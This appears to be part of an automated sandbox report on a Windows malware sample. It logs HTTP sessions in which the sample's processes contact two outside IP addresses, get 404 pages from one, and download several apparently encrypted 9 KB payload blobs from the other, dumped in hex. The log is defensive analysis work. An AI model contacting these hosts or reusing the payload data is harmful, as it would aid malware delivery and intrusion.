                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              36192.168.2.84976591.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:39.447741032 CEST166OUTGET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:39.802493095 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:39 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              37192.168.2.84976691.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:42.656124115 CEST166OUTGET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:43.011125088 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:42 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.84976891.202.233.141805588C:\Windows\sysbrapsvc.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:45.383446932 CEST166OUTGET /6 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:24:45.734081030 CEST728INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:45 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.849772185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:55.958838940 CEST167OUTGET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:24:56.300591946 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:56 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Wed, 08 May 2024 11:35:13 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663b6371-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:24:56.300753117 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:24:56.300765991 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:24:56.300777912 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:24:56.300792933 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:24:56.300806046 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:24:56.300821066 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:24:56.300833941 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.849774185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:24:59.695621014 CEST167OUTGET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:00.037353992 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:24:59 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:40 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7350-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
                                                                              Data Ascii: NGS!tnB mW2L#:~1MF\TOm/<cC;U7L4UM,%7Z/N[dPoS\M\rU9yBDU5q}iCBvZy]k:a6#}];)2^"ivNmo_A_z#Q~noxqJdQ!ys02-.Nd5:AZ,sb22i1sz0T0&NQ'j<B[.py;H0<yKk6G\lNC=ct{MsThZXlT?S/Q0LfZW,Mif \AMF'bhlJ>xI2Z*XeG)W8'QLTc=>Dw,NM?0N"!2 `_j8*`Fy$D7EjYO&$b.o+zNANMeuumeBV5(%VhRYtNL(2=;DpsubxAl|s,d2-E`pw *vh+GO> IngxCmFh{2Z7|k|`{E#&VV)A>G>#(#,#>KXF=p"iehp7wmt,TNUI~,~iP~V}flj7z_RJLdYKj<yDVTmT@G=GEQlk>nQi^a4|Qp^<r49xLv_ [TRUNCATED]
                                                                              May 8, 2024 15:25:00.037369013 CEST1289INData Raw: c2 0b 7f 53 28 72 18 a7 0b ee 55 6f cb 3d 74 0d 0f 24 2a d4 e2 5e f1 11 0b 67 be e2 a9 95 d4 e3 1a 8a 33 c3 fb 3a 06 e7 5d 63 2c a9 76 a4 40 5b 95 94 55 4e 4f 9d 58 43 89 59 bb 37 cc 7f 1f 27 11 42 25 58 d1 91 c5 11 5e 4d dc 47 c6 41 78 cc c4 9f
                                                                              Data Ascii: S(rUo=t$*^g3:]c,v@[UNOXCY7'B%X^MGAx-,-El4o*c[Tp-%!Ch2)U]Rs;c2E-:-lO~i:2FM3vT&||,A0&(,dT{[{>q87tP_V
                                                                              May 8, 2024 15:25:00.037383080 CEST1289INData Raw: 0a 77 7f 18 36 b7 b6 91 f6 e6 01 f7 fb 10 50 4a 85 63 ef 94 f5 60 b5 c8 06 c8 3d 64 69 da a8 6d 30 32 bf 1e 29 ff 8e c7 b9 25 0e f1 a7 27 9c 08 3d 52 af 70 5d 92 9b c2 a7 1b ca 81 72 a0 4e a1 bd 92 d3 71 a2 66 e1 25 b1 70 36 c3 d0 df c7 b3 11 ca
                                                                              Data Ascii: w6PJc`=dim02)%'=Rp]rNqf%p6/f ^v8M4E@jX5'3A!c@jW]l|7dqsG8v^f']MKhR1HVE&9pX6@n4VX3DNi
                                                                              May 8, 2024 15:25:00.037398100 CEST1289INData Raw: 2a 80 d4 70 56 39 70 59 4d 0f e5 66 e8 46 12 cf 0a fe df f4 7c 25 6d 8f ac d6 8c 63 e2 2c af d7 d4 f1 79 23 96 79 70 f7 15 71 bf 22 00 5f b0 b7 32 f5 4d 1d cc 3f 86 c7 00 fa 71 80 a2 6f 15 92 cb d2 09 07 bf 39 61 4a 6d 1f f0 cf 9a b2 82 28 c8 65
                                                                              Data Ascii: *pV9pYMfF|%mc,y#ypq"_2M?qo9aJm(e*Xpv=,a6o[*C%9=cg7*8xpN&xh[l6R?LdL .[</.`;&1R/Q
                                                                              May 8, 2024 15:25:00.037410975 CEST1289INData Raw: a4 9d aa 76 a5 5b 73 c6 19 e8 80 c3 a4 48 a8 85 ca 88 43 82 67 d3 d6 66 0d 7a 36 34 64 b8 83 cc 98 a4 67 cf 4e 4f 4c 68 80 0c 75 9a 0c 85 a3 9c a5 bd 4a bc ea 47 7f b8 71 b4 9d a0 7b 9b 68 85 84 2c 86 b1 1b 7c 8a 14 67 c6 41 95 51 ff 3e 18 83 6f
                                                                              Data Ascii: v[sHCgfz64dgNOLhuJGq{h,|gAQ>o5{91GaBJRq!_fRy*QCRWLbdTs@/ENA5)d{# o`k_<AiHqN,6eH )LTn^Qnyap)SaM
                                                                              May 8, 2024 15:25:00.037431955 CEST1289INData Raw: 57 ab c1 04 01 4b 78 e6 fc e2 60 39 58 67 cd 41 fc 8a 98 51 b7 4e 6b 4a 3f 87 57 5b 23 21 30 63 d3 6c 63 28 b8 9d ad 2a f5 dc 9b 65 17 ea 19 98 63 fc 8a 0d a7 60 46 fe bc 00 2c d3 b0 d9 d7 df 54 e5 97 00 01 e8 bb 31 c9 86 36 56 69 db 80 e2 55 b0
                                                                              Data Ascii: WKx`9XgAQNkJ?W[#!0clc(*ec`F,T16ViUt[1"Y!?n{T\,|q=q/0T?\QIjcv(JHJdc7-{-sc>d!ql#LqlrvD;`-w/IO:
                                                                              May 8, 2024 15:25:00.037494898 CEST1289INData Raw: 87 d2 44 52 54 d0 7c d3 ef bf 7d 15 8c 05 3e 44 a3 62 eb a9 16 ee 0a e7 ea b7 a4 36 c3 dd c3 ee cf 88 56 4c 2c e5 fd 02 ae 51 65 dc 04 6f dc 97 ca e5 49 9f 6a 7c b1 6c bb b7 39 b1 02 59 2f 47 11 1d c1 f7 34 ba c1 23 0c a5 17 8c cb 01 63 77 22 31
                                                                              Data Ascii: DRT|}>Db6VL,QeoIj|l9Y/G4#cw"1A~.<ZBoD"`(W;`T73-"pI;Igk"DryYwDZMU(RRV)H:Z:{{5\rBn}oIq_7,>h.tV{r
                                                                              May 8, 2024 15:25:00.037509918 CEST465INData Raw: b3 d0 ab 1f 76 29 d1 74 b5 bf 97 38 a1 3e ac 4f 49 3d 20 20 c9 37 69 05 0b 00 02 b6 94 ee e9 61 47 a0 4c 0a 82 8b 91 eb 0c e8 22 83 fc 35 a8 61 47 af 8f 8f f9 0f 41 de 32 73 ff a9 08 b6 33 d9 ff a5 0e cc fc a2 24 bc 6c 9f 31 c5 e1 cc a1 02 e7 fc
                                                                              Data Ascii: v)t8>OI= 7iaGL"5aGA2s3$l1<ce uUK[OZL,NQLm]r.IDaKs%*l!KHtqqbQ=sIIsmVd5ZY*]X7uzEnSVNsp$!wmB


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.849776185.215.113.66802060C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              May 8, 2024 15:25:02.402909040 CEST167OUTGET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 185.215.113.66
                                                                              May 8, 2024 15:25:02.743000984 CEST1289INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:25:02 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 9224
                                                                              Last-Modified: Tue, 07 May 2024 18:30:44 GMT
                                                                              Connection: keep-alive
                                                                              ETag: "663a7354-2408"
                                                                              Accept-Ranges: bytes
                                                                              Data Raw: 4e 47 53 21 00 02 00 00 cc da 9c ef c1 96 97 c6 a6 fa 74 6e 9a a2 42 84 a8 83 88 1a b9 20 6d 57 1d 32 de db 10 4c 8c be 23 3a d0 0d 1a 7e 97 fc 31 4d da 46 81 5c 54 e1 4f ef 9c d7 8b 98 6d cf f6 fc 2f dd d0 3c e7 eb c9 01 dd 87 63 83 9d a7 ab c6 43 be 3b 55 fd 37 91 4c 34 55 8e 4d 2c 25 a9 37 be 5a c3 2f 4e eb de d4 96 5b 64 b4 cc 09 be 82 dd 50 f1 6f 53 e9 5c 18 4d ab a1 d8 5c 05 72 55 d1 39 79 8e 8f c0 92 cc a4 84 42 44 84 55 98 8d 35 a7 71 dd f3 7d cc 69 c7 1d ff 18 43 cb a8 42 76 bb da 5a 79 5d 6b c2 c5 f9 3a f6 e3 61 14 36 11 23 7d 5d 3b 29 e1 32 8f c8 5e 22 a3 94 cf 93 1b ce 69 76 8d 1a d6 b4 4e 17 c2 fc 6d 6f 5f 41 00 87 00 c1 5f 00 7a 90 23 9a 51 7e 6e ae bf 1f e4 d0 d3 05 f0 fc 12 6f 78 c3 a9 ca 71 9f 03 b0 4a 07 64 51 21 79 73 30 e4 81 db c9 bd 32 2d 2e 4e bb 64 35 3a 1e 08 41 ed 8e f2 82 df ca 88 fb cf 5a a9 2c 73 62 1a 32 e0 1d 0a 32 b4 69 31 73 bd 7a f9 be 30 a8 54 da ec 30 fb 26 08 4e 51 27 6a 3c b8 81 1a 42 af 5b 2e 70 90 d0 0b 79 f6 84 99 ba 95 ff f0 e9 82 3b 1b ec 96 ae 48 14 95 a7 [TRUNCATED]
